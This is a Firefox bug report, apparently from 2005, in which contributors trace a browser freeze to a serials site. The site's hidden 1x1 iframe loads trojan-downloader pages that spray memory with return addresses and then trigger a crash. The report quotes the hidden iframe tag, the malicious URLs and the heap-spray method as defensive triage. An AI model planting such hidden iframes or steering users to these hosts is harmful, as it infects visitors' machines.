Closed
Bug 320348
Opened 19 years ago
Closed 19 years ago
browser freezes because of an illegal script
Categories
(Core :: Security, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 317334
People
(Reporter: fignamoya, Assigned: dveditz)
References
()
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 Browser freezes due to an illegal script on a page. This, in turn causes all firefox windows to close. Reproducible: Always Steps to Reproduce: 1. go to http://www.serials.ws/all/?l=v&pn=3 2. ctrl+f and search 1301 on the page (javascript link to visual assist x... 1301) 3. click on the link and observe how the browser runs cpu usage to 100%
Updated•19 years ago
|
Component: General → Layout
Product: Firefox → Core
QA Contact: general → layout
Version: 1.5 Branch → 1.8 Branch
Comment 1•19 years ago
|
||
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1) Gecko/20051215 Firefox/1.6a1 ID:2005121500 I see this too.
in addition this appears to disable block popups option in the browser
Component: Layout → JavaScript Engine
Comment 3•19 years ago
|
||
view-source:http://www.serials.ws/all/?l=v&pn=3 <a href=javascript:d(170307)>Visual Assist X 10.1.1301</a> :: 2005-04-30 http://www.serials.ws/serws.js function d(id){ window.open('/d.php?n='+id,'Operate','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,width=650,height=550'); } view-source:http://www.serials.ws/d.php?170307 this page contains an iframe: <iframe src="http://toolbarurl.biz/dl/adv661.php" width=1 height=1></iframe> the iframe loads: view-source:http://toolbarurl.biz/dl/adv661.php this in turn loads 8 iframes: view-source:http://toolbarurl.biz/dl/fillmemadv661.htm and 1 iframe: view-source:http://toolbarurl.biz/dl/bag.htm
Comment 4•19 years ago
|
||
seen with the view-source: prefixed, the URLs in comment 3 are harmless. view-source:http://toolbarurl.biz/dl/fillmemadv661.htm fills the memory with with 100000 times an returnadress, and then a short piece of code, 586 words. memory is filled by 8 iframes of this type, and the bag.html seems to be used to produce a crash, hopefully landing in one of those long regions leading to the exploit code. google search for ADV661 shows it is a trojan: http://sandbox.norman.no/live_2.html?logfile=437547 http://www.sophos.com/virusinfo/analyses/trojdownldrdl.html If you've been on the site, read the reports to check if you are infected. I don't want to try going to this site with js enabled. I'm setting component to Security, so dveditz@cruzio.com can look if we are in danger, or if it's just a hang.
Assignee: nobody → dveditz
Status: UNCONFIRMED → NEW
Component: JavaScript Engine → Security
Ever confirmed: true
QA Contact: layout → toolkit
Comment 5•19 years ago
|
||
Similar scripts used in Bug 320760 Browser hangs at 100% CPU following document.write by malicious javascript Bug 317334 hang when long wrappable string is passed to prompt() [e.g. as used in the exploit for IE's <body onload=window()> bug] *** This bug has been marked as a duplicate of 317334 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•